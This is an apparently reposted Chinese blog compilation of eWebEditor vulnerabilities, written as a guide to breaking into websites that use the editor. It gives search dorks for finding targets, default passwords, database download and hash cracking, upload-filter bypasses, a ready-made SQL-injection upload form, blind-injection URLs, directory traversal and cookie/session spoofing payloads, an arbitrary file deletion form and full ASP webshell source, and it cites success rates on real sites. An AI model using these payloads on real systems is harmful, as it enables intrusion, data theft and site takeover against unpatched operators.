- 浏览: 11711294 次
文章分类
最新评论
-
wahahachuang8:
我觉得这种东西自己开发太麻烦了,就别自己捣鼓了,找个第三方,方 ...
WebSocket和node.js -
xhpscdx:
写的这么详细,全面,对架构师的工作职责,个人能力都进行了梳理。 ...
架构师之路---王泽宾谈架构师的职责 -
xgbzsc:
是http://www.haoservice.com 吗?
android WIFI定位 -
lehehe:
http://www.haoservice.com/docs/ ...
android WIFI定位 -
lehehe:
http://www.haoservice.com/docs/ ...
android WIFI定位
Ewebeditor最新漏洞及漏洞大全
Ewebeditor最新漏洞及漏洞大全[收集]
来源:转载作者:佚名时间:2009-06-03 00:04:26
以下文章收集转载于网络:) 算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,
所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
漏洞更新日期TM: 2009 2 9日转自zake’S
Blog
ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。http://127.0.0.1/1.gif.asp搭建好了,在官方的地方执行网络地址然后确定以后,
这里是最关键的一部!
这里点了远程上传以后,再提交得到木马地址
由于官方在图片目录做了限制导致不能执行ASP脚本而没能拿到WEB权限。
属于安全检测漏洞版本ewebeditor v6.0.0
以前的ewebeditor漏洞:
ewebeditor注入漏洞
大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话
今天我给大家带来的也是ewebeditor编辑器的入侵方法
不过一种是注入,一种是利用upload.asp文件,本地构造
NO1:注入
http://www.XXX.com/ewebeditor2007/ewebeditor.asp?id=article_content&style=full_v200
编辑器ewebedior7以前版本通通存在注入
直接检测不行的,要写入特征字符
我们的工具是不知道ewebeditor的表名的还有列名
我们自己去看看
哎。。先表吧
要先添加进库
开始猜账号密码了
我们==
心急的往后拉
出来了
[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 851120
对吧^_^
后面不说了
NO2:利用upload.asp文件,本地构造上传shell
大家看这里
http://www.siqinci.com/ewebeditor2007/admin_style.asp?action=stylepreview&id=37
如果遇见这样的情况又无法添加工具栏是不是很郁闷
现在不郁闷了,^_^源源不一般
我们记录下他的样式名“aaa”
我已经吧upload.asp文件拿出来了
我们构造下
OK,我之前已经构造好了
其实就是这里
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myformenctype=”multipart/form-data”>
<input type=file name=uploadfile size=1 style=”width:100%”>
<input type=submit value=”上传了”></input>
</form>
下面我们运行他上传个大马算了
UploadFile上传进去的在这个目录下
2008102018020762.asa
过往漏洞:
首先介绍编辑器的一些默认特征:
默认登陆admin_login.asp
默认数据库db/ewebeditor.mdb
默认帐号admin
密码admin或admin888
搜索关键字:”inurl:ewebeditor”关键字十分重要
有人搜索”eWebEditor -eWebSoft在线编辑器”
根本搜索不到几个~
baidu.google搜索inurl:ewebeditor
几万的站起码有几千个是具有默认特征的~
那么试一下默认后台
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
试默认帐号密码登陆。
利用eWebEditor获得WebShell的步骤大致如下:
1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe
ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
然后在上传的文件类型中增加“asa”类型。
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到
“预览”
了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。
漏洞原理
漏洞的利用原理很简单,请看Upload.asp文件:
任何情况下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
高级应用
eWebEditor的漏洞利用还有一些技巧:
1.使用默认用户名和密码无法登录。
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。
2.加了asa类型后发现还是无法上传。
应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt),“ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”,“”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了“asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0
sp2中也可以利用类似的方法绕过对扩展名的过滤。
3.上传了asp文件后,却发现该目录没有运行脚本的权限。
呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。
4.已经使用了第2点中的方法,但是asp类型还是无法上传。
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的“asp”删除。
后记
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索“ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg
2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
eWebEditor=>2.8 商业版后台一句话木马利用
登陆后台,点击修改密码---新密码设置为 1":evalrequest("a")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
ewebeditor漏洞利用总结
先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:
1、首先访问默认管理页看是否存在。
默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)
2、默认管理帐号密码!
默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。
3、默认数据库地址。
如果密码不是默认的。我们就访问是不是默认数据库!尝试下载数据库得到管理员密码!管理员的帐号密码,都在eWebEditor_System表段里,sys_UserName Sys_UserPass 都是md5加密的。得到了加密密码。可以去www.cmd5.com www.xmd5.org 等网站进行查询!暴力这活好久不干了!也可以丢国外一些可以跑密码的网站去跑!
默认数据库路径为:ewebeditor/db/ewebeditor.mdb 常用数据库路径为:ewebeditor/db/ewebeditor.asa ewebeditor/db/ewebeditor.aspewebeditor/db/#ewebeditor.asa ewebeditor/db/#ewebeditor.mdbewebeditor/db/!@#ewebeditor.asp ewebeditor/db/ewebeditor1033.mdb 等
很多管理员常改.asp后缀,一般访问.asp .asa 后缀的都是乱码!可以用下载工具下载下来,然后更改后缀为.mdb 来查看内容!
4、说说漏洞基本利用步骤,还以asp为例!
登陆后台以后。选择样式管理,默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。.asa .cer .cdx 等!.asp 过滤过了。但是我们可以用.asaspp后缀来添加,这样上传文件正好被ewebeditor 吃掉asp后缀,剩下.asp 呵呵!代码不详细说了。总之是个很可笑的过滤!同样,如果遇到一个管理员有安全意识的,从代码里,把.asp .asa .cer .cdx 都完全禁止了,我们也可以用.asasaa 后缀来突破。添加完了后缀,可以在样式管理,点击预览,然后上传!
5、默认管理页不存在!
在实际入侵过程中,有很多默认的管理页不存在的时候。我们可以直接访问样式管理页面 ewebeditor/admin_style.asp 然后用第4步的方式拿webshell。如果样式管理页也不存在的话,我们可以看数据库内的样式表(ewebeditor_style)里面有没有比我们先进去的朋友留下的样式。然后构造上传!具体url如下:eWebEditor/ewebeditor.asp?id=content&style=www 红色部分是我们发现被修改添加了asa后缀的样式名,大家自行修改!
6、ewebeditor的几个版本存在注入!
ewebeditor 以前版本都存在注入 ewebeditor/ewebeditor.asp?id=article_content&style=Full_v200 !
添加验证字符串,和管理员字段可以跑出管理员的md5加密密码!
ewebeditor v2.1.6存在注入,可以用union select 添加上传后缀进行上传!先贴漏洞利用方式!
--------------------------------------------------------------------------------------------------------------
<H3>ewebeditor asp版 2.1.6上传漏洞利用程序----</H3><br><br>
<form action="http://www.xxx.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrlfrom ewebeditor_style where s_name='standard'and'a'='a" method=postname=myform enctype="multipart/form-data">
<input type=file name=uploadfilesize=100><br><br>
<input type=submit value=Fuck>
</form>
--------------------------------------------------------------------------------------------------------------
以上代码令存为html!修改红色部分的路径,然后自动上传 .cer 文件!漏洞原因是因为sStyleName变量直接从style中读取,并没有过滤,所以可以包含任意字符!用select在ewebeditor_style表中查找s_name为sStyleName的记录,找不到就提示出错!在sStyleName变量中用union来构造记录,我们可以在sAllowExt中加入"|cer"、"|asa"等!
另外还有一些版本的ewebeditor的upload.asp文件存在注入漏洞!贴几个注入用的url!信息错误则返回脚本出错的提示,在浏览器左下角!具体利用如下:
ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1
注意修改红色部分的字段名、位数、ascii码的值!
7、目录遍历漏洞!
这里大概说一下!目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!这个文件有的不需要登陆验证,有些需要!很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!这种情况下,唯一可以利用的也就是利用遍历目录功能查看网站文件,比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等!这些都自由发挥了!说下漏洞利用方法!
漏洞利用方式如下:在上传文件管理页面随便选择一个上传样式!比如ewebeditor/admin_uploadfile.asp?id=14 在id后面添加&dir=../..
类似如下:webeditor/admin_uploadfile.asp?id=14&dir=../../../../data/可以看到网站数据库的路径!
另外一个遍历目录的漏洞文件是ewebeditor/asp/browse.asp
漏洞代码为:
Function GetList()
Dim s_List, s_Url
s_List = ""
Dim oFSO, oUploadFolder, oUploadFiles,oUploadFile, sFileName
'Response.Write sCurrDir
'On Error Resume Next
Set oFSO =Server.CreateObject("Scripting.FileSystemObject")
Set oUploadFolder =oFSO.GetFolder(Server.MapPath(sCurrDir))
'注意一下sCurrDir变量,这个值等下我们可以用到
If Err.Number>0 Then
s_List = ""
Exit Function
End If
If sDir <> "" Then
If InstrRev(sDir, "/") > 1Then
s_Url= Left(sDir, InstrRev(sDir,"/") - 1)
Else
s_Url = ""
End If
s_List = s_List & "" & _
"" & _
".." & _
" " & _
""
End If
'Response.WritesDir&"!"&s_List
Dim oSubFolder
For Each oSubFolder InoUploadFolder.SubFolders
'Response.Write oUploadFolder.SubFolders
If sDir = "" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & "/" &oSubFolder.Name
End If
s_List = s_List & "" & _
"" & _
"" & oSubFolder.Name &"" & _
" " & _
""
Next
'Response.Write s_List
Set oUploadFiles = oUploadFolder.Files
For Each oUploadFile In oUploadFiles
'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
'这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
If sDir = "" Then
s_Url = sContentPath & sFileName
Else
s_Url = sContentPath & sDir &"/" & sFileName
End If
s_List = s_List & "" & _
"" & FileName2Pic(sFileName)& "" & _
"" & sFileName &"" & _
"" &GetSizeUnit(oUploadFile.size) & "" & _
""
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
If sDir = "" Then
s_Url = ""
's_Url = "/"
Else
s_Url = "/" & sDir &""
's_Url = "/" & sDir &"/"
End If
s_List = s_List & ""
s_List = HTML2JS(s_List)
'Response.WriteServer.HTMLEncode(s_List)&"!"&s_Url
s_List = "parent.setDirList("""& s_List & """, """ & s_Url &""")"
GetList = s_List
End Function
'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
Function CheckValidExt(s_FileName)
If sAllowExt = "" Then
CheckValidExt = True
Exit Function
End If
Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName,InStrRev(s_FileName, ".") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), "|")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的
Sub InitParam()
sType =UCase(Trim(Request.QueryString("type")))
sStyleName =Trim(Request.QueryString("style"))
Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i),"|||")
If Lcase(sStyleName) =Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next
If bValidStyle = False Then
OutScript("alert('InvalidStyle.')")
End If
sBaseUrl = aStyleConfig(19)
'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse = 1
If nAllowBrowse <> 1 Then
OutScript("alert('Do not allowbrowse!')")
End If
sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <>"/" Then
Select Case sType
Case "REMOTE"
sUploadDir = "../../" &sUploadDir & "Image/"
Case "FILE"
sUploadDir = "../../" &sUploadDir & "Other/"
Case "MEDIA"
sUploadDir = "../../" &sUploadDir & "Media/"
Case "FLASH"
sUploadDir = "../../" &sUploadDir & "Flash/"
Case Else
sUploadDir = "../../" &sUploadDir & "Image/"
End Select
End If
'sUploadDir =sUploadDir &"/"
Select Case sBaseUrl
Case "0"
'sContentPath = aStyleConfig(23)
Select Case sType
Case "REMOTE"
sContentPath = "../" &aStyleConfig(3) & "Image/"
Case "FILE"
sContentPath = "../" &aStyleConfig(3) & "Other/"
Case "MEDIA"
sContentPath = "../" &aStyleConfig(3) & "Media/"
Case "FLASH"
sContentPath = "../" &aStyleConfig(3) & "Flash/"
Case Else
sContentPath = "../" &aStyleConfig(3) & "Image/"
End Select
Case "1"
sContentPath =RelativePath2RootPath(sUploadDir)
Case "2"
sContentPath =RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select
Select Case sType
Case "REMOTE"
sAllowExt = aStyleConfig(10)
Case "FILE"
sAllowExt = aStyleConfig(6)
Case "MEDIA"
sAllowExt = aStyleConfig(9)
Case "FLASH"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select
sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址
sDir = Trim(Request("dir")) '得到dir变量
sDir = Replace(sDir, "\","/") '对dir变量进行过滤
sDir = Replace(sDir, "../","")
sDir = Replace(sDir, "./","")
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir& sDir)) = True Then
sCurrDir = sUploadDir & sDir &"/"
'重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了
'虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用下面的利用中给出
Else
sDir = ""
End If
End If
End Sub
利用方式如下:
http://site/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/admin
这样子就可以看到admin的内容了。构造特殊的dir绕过上面的验证!页面空白的时候查看源代码,就可以看到目录列表了!
8、session欺骗漏洞!
适用于一些设置不当的虚拟主机。当旁注得到一个webshell,而目标站存在ewebeditor却不能找到密码的时候可以尝试欺骗进入后台!顺序如下:
新建一个.asp文件,内容如下:<%Session("eWebEditor_User") = "123132323"%> 然后访问这个文件,再访问ewebeditor/admin_default.asp!欺骗进入后台!不过很老了!
9、后台跳过认证漏洞!
访问后台登陆页面!随便输入帐号密码,返回错误!然后清空浏览器,在地址栏输入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后再清空地址栏,在路径里输入后台登陆后的页面,比如: admin_default.asp admin/default.asp 等。直接进入后台,利用方式见上文!
10、利用远程上传功能!
比如s_full样式就存在这个功能,打开编辑页面,然后图片,选择输入url 比如:http://site.com/1.gif.asp ! 然后选择上传远程文件!自动就把1.gif.asp 保存在上传目录内!注:网上的东西大部分传来传去,这个办法愚弄自己还成!文件的确显示后缀为.asp但是不能访问,因为收集过来的时候自动截止在1.gif了所以后面的.asp等于没有!而且gif的内容就是我们这个url的路径!呵呵,后来又看到一个利用方式!是利用远程搜集的时候执行,我们文件的代码生成另外的小马!
利用代码如下:
首先建立1.gif.asp 代码如下
<%
Set fs =CreateObject("Scripting.FileSystemObject")
SetMyTextStream=fs.OpenTextFile(server.MapPath("\akteam.asp"),1,false,0)
Thetext=MyTextStream.ReadAll
response.write thetext
%>
在我们的1.gif.asp的同目录下建立一个akteam.asp文件,内容就是我们的小马:
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%setdama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action=''method=post>"%>
<%="<input type=textname=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submitvalue=save>"%>
<%="</form>"%>
利用上面说的远程上传的方式!可以得到webshell!成功率取决于,虚拟主机的安全设置!
11、任意文件删除漏洞!
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入!看代码
' 把带"|"的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
' 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName =oRs("D_SavePathFileName")
看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:sSavePathFileName =GetSafeStr(Request.Form("d_savepathfilename"))
...
oRs("D_SavePathFileName") =sSavePathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr =Replace(Replace(Replace(Trim(str), "'", ""), Chr(34),""), ";", "")
End Function
既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新闻,于是主目录下的eWebEditor.asp不见了!漏洞利用:
<HTML><HEAD><TITLE>eWebEditor删除文件 byldjun(>
新闻列表%20|%20增加新闻
增加新闻
http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
method="post"name="myform">
<input type=hidden name=d_originalfilename>
<input type=hidden name=d_savefilename>
<table cellspacing=3 align=center>
<tr><td>要删的文件(相对路径就可以了):</td>
<td><input type="text"name="d_savepathfilename" value=""size="90"></td>
</tr>
<tr><td>新闻标题(随便填):</td>
<td><input type="text"name="d_title" value="" size="90"></td>
</tr>
<tr><td>标题图片:</td>
<td><selectname="d_picture" size=1><option value=''>无</option></select>
当编辑区有插入图片时,将自动填充此下拉框</td>
</tr>
<tr><td>新闻内容(随便填):</td>
<td><textareaname="d_content"></textarea></td>
</tr>
</table>
<input type=submit name=btnSubmitvalue=" 提交 ">
<input type=reset name=btnResetvalue=" 重填 ">
</form>
</BODY></HTML>
删除文件漏洞一般是配合其他漏洞使用的,比如目录遍历
<a href='list.asp'>中的list.asp地址要修改
<a href='add.asp'>中的add.asp地址要修改
<formaction="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
(http://127.0.0.1/editor/Example/NewsSystem/addsave.asp地址要修改)
另外一个简单利用方式:
<formaction="http://www.xxxbing.com/editor/example/newssystem/addsave.asp"method="post">
<input type=hiddenname=d_originalfilename value="x">
<input type=hidden name=d_savefilenamevalue="x">
要删除的文件(相对路径,多个文件用“|”隔开)<br>
<input type=textname=d_savepathfilename>
<input type=hiddenname="d_title" value="x">
<input type=hiddenname="d_picture" value="x">
<textareaname="d_content">x</textarea>
<input type=submit name=btnSubmitvalue="submit">
</form>
然后得到返回的新闻ID再提交:http://www.XXXXX.com/editor/example/newssystem/delete.asp?id=[id]
有几个版本的ewebeditor上传类型是在security.asp 文件控制的!直接删除该文件可以上传任意webshell!
12、其他!
其他说点什么呢!以上的办法都是本人经验和网上搜集!暂时就想到这些了,以后想到了再补全!说说aspxphp jsp版本的利用吧!
ASPX版:
受影响文件:eWebEditorNet/upload.aspx
利用方法:添好本地的cer的Shell文件。在浏览器地址栏输入javascript:lbtnUpload.click();就能得到shell。嘿嘿....绕过了限制......成功的上传了ASPX文件....文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....
PHP版本:PhP版本和asp版本利用方式类似!不过php权限较高,不多废话了!
jsp版本:网上有很多jsp的版本,根本没有对上传文件类型进行检测!需要注意的是jsp版本的没有上传按钮!直接选择文件,回车就可以提交了!
安脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞。
安全漏洞
管理员未对编辑器的数据库路径和名称进行修改,导致可以利用编辑器默认路径直接对网站数据库进行下载。
管理员未对编辑器的用户登录路径进行修改,导致黑客可以利用网站数据库所获得的用户名和密码直接登陆编辑器管理后台。
ASP版
关键文件的名称和路径
Admin_login.asp
Admin_default.asp
Admin_style.asp
Admin_uploadfile.asp
Upload.asp
Admin_modipwd.asp
eWebEditor.asp
db/ewebeditor.mdb
一般用这个的默认后台的URL都是默认的
www.***.com/admin/ewebeditor/login_admin.asp
www.***.com/ewebeditor/login_admin.asp
www.***.com/admin/eweb/login_admin.asp
www.***.com/admin/editor/login_admin.asp
下载数据库
还有如果默认的账户和密码修改了,我们可以下载他们的数据库,然后本地破解MD5了
默认数据库…/db/ewebeditor.mdb 或者。../db/ewebeditor.asp
登录后台后,点击样式管理,随便选择一个样式,自带的样式不能修改的。
拷贝一个样式,在其它类型中增加,asa类型,接下来把免杀的asp木马的后缀名改成asa,返回管理首页,点击预览,然后选择插入其它文件的按钮进行asp木马的上传,上传的ASP木马就在,UploadFILE文件夹里。
如果加了asa类型后发现还是无法上传。应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往直接在sAllowExt =Replace(UCase(sAllowExt),”asp”,””)一句上修改。
但是我们只要在上传类型中增加“aaspsp”,就可以传asp文件了,
如果上述两种方法都失败了,则利用eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的应用文件映射中的ASP删除。
有的站数据库设置了只读属性,这样的站你是无法新加样式的,这样的站你可以看他数据库里的样式设置情况,一般很多时候都是让人给拿过的,而且明显的asa在那里。这样的话就可以直接构造一个调用这个样式的连接来上传shell.
比如发现数据库里有样式123他设置的是可以上传asa的话,那么就可以这样调用:http://www.***.com/eweb/ewebeditor.asp?id=contentCN&style=123
这样就可以直接上传了,然后在点编辑就会找到shell的路径了。其实这个漏洞主要是upload.asp的过滤不严造成的,新版的应该都修复了,具体爱影响的版本我也没统计过。
遍历路径
Ewebeditor遍历路径漏洞,当数据库只读的时候,ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=再加&dir=/或&dir=http://www.****.com// 看到整个网站文件了,不过此项测试的时候发现,只有登录成功才能进行操作。
Cookie漏洞
漏洞文件:admin_private.asp
漏洞语句:
<% if session (“eWebEditor_User”) = “”Then
Response.Redirect “admin_login.asp”
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个mrchen.asp内容如下:
<%Session (“eWebEditor_User”) =”11111111”%>
访问mrchen.asp,再访问后台任何文件,forexample:Admin_Default.asp这个拿shell的方法就简单了。
相关推荐
**ewebeditor漏洞与防范专题资源** EwebEditor是一款广泛应用于网页编辑的富文本编辑器,它为用户提供了一个类似于Microsoft Word的界面,使得在网页上编辑内容变得简单易行。然而,随着其广泛应用,安全问题逐渐浮...
eWebEditor 2.1.6 asp版 上传漏洞利用程序 eWebEditor 2.1.6 asp版 上传漏洞利用程序 eWebEditor 2.1.6 asp版 上传漏洞利用程序
太子黑盟最新ewebeditor asp版 上传漏洞利用工具.rar
文件 I.JS// eWebEditor 7.0 设置文件 文件 upload.asp//上传文件,不提供上传,就把文件名修改其它名或者删除 文件 upfileclass.asp//上传文件 文件 browse.asp//浏览上传文件 目录 sharefile 目录 ...
1. **富文本编辑**:eWebEditor允许用户像在桌面应用中那样编辑网页内容,支持字体设置、字号调整、颜色选择、对齐方式、列表样式等基本文本格式化。 2. **图像处理**:用户可以直接在编辑器中上传图片,进行裁剪、...
检查并堵住网站的eWebEditor漏洞
ewebeditor asp版 2.1.6 上传漏洞利用程序.htm
eWebEditor主功能不需要在客户端安装任何的组件或控件,操作人员就可以以直觉、易用的界面创建和发布网页内容。 您可以通过eWebEditor自带的可视配置工具,对eWebEditor进行完全的配置。 eWebEditor是非常容易与您...
本篇文章将详细介绍一些常见网页编辑器的漏洞,包括FCKeditor、eWebEditor、Cuteditor、Freetextbox、Webhtmleditor、Kindeditor以及一些具有争议性的编辑器如eWebEditorNET、southidceditor和bigcneditor。...
【版本更新说明】 ·Tomcat环境下,修订图片、flash、多媒体以及附件上传后路径问题; 部署方式: 1、把文件夹下除WEB-INF文件夹的全部文件复制到您的网站根目录下; 2、把WEB-INF文件夹下的style.xml和button....
文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)1 本文是作者的网络安全自学教程系列的一部分,主要关注的是如何理解和防范网络安全中的某些常见漏洞。作者强调反对利用这些知识进行非法活动,鼓励读者以保护...
及时升级到最新版本可以确保享受到最新的功能和修复的安全漏洞。 6. **易用性**:eWebEditor以其直观的用户界面和易于配置的特性而受到赞誉。即使是对编程不太熟悉的用户,也能通过简单的设置快速上手。 7. **...
- 漏洞存在于eWebEditor的文件上传功能,只过滤了`ASP`扩展名,忽略了其他可能的脚本文件,如`ASA`、`CER`等。 - 攻击者利用此漏洞,可以绕过安全防护,上传并执行恶意脚本,从而获取WebShell。 请注意,这些操作...
3. 版本更新:检查EWebEditor是否为最新版本,及时提示用户升级以修复已知漏洞。 4. 日志监控:查看后台日志,查找异常访问记录,以便尽早发现潜在攻击行为。 5. 配置检查:核对后台配置文件,确保各项安全设置正确...
eWebEditor8.8js版不带管理后台,更安全;eWebEditor5.CAB插件未加破解,即在线截图、服务器端读取word、excel不能用,其它功能本地与服务器端都能用。请按里面的说明修改文件保存路径。
### 二、ASP下常见上传漏洞类型及原理 #### 1. 文件名篡改漏洞 **原理:** 攻击者通过修改上传文件的原始名称,使得原本不被允许上传的文件能够绕过服务器端的检测机制。例如,将恶意脚本文件命名为“shell.asp....
描述中提到了几种常见的编辑器目录名称,如`editor`、`edit`、`fckeditor`、`ewebeditor`等,这提示我们在寻找漏洞时,可以通过目录扫描工具(如御剑)来查找这些目录是否存在,从而定位可能存在的编辑器。...
其中,还提到了一些特定编辑器的版本信息,例如eWebEditor的多个版本及漏洞情况。 此外,手册中还涉及了多个具体编辑器的漏洞利用方式,比如FCKeditor编辑器的版本信息和文件上传路径的查看,以及eWebEditor利用...
同时,定期更新到最新版本,以获得最新的功能和修复已知的安全漏洞。 总之,eWebEditor V6.0 for ASP 是一个强大且易于使用的Web编辑工具,尤其适用于需要后台内容管理的网站。其丰富的功能和良好的兼容性,使得它...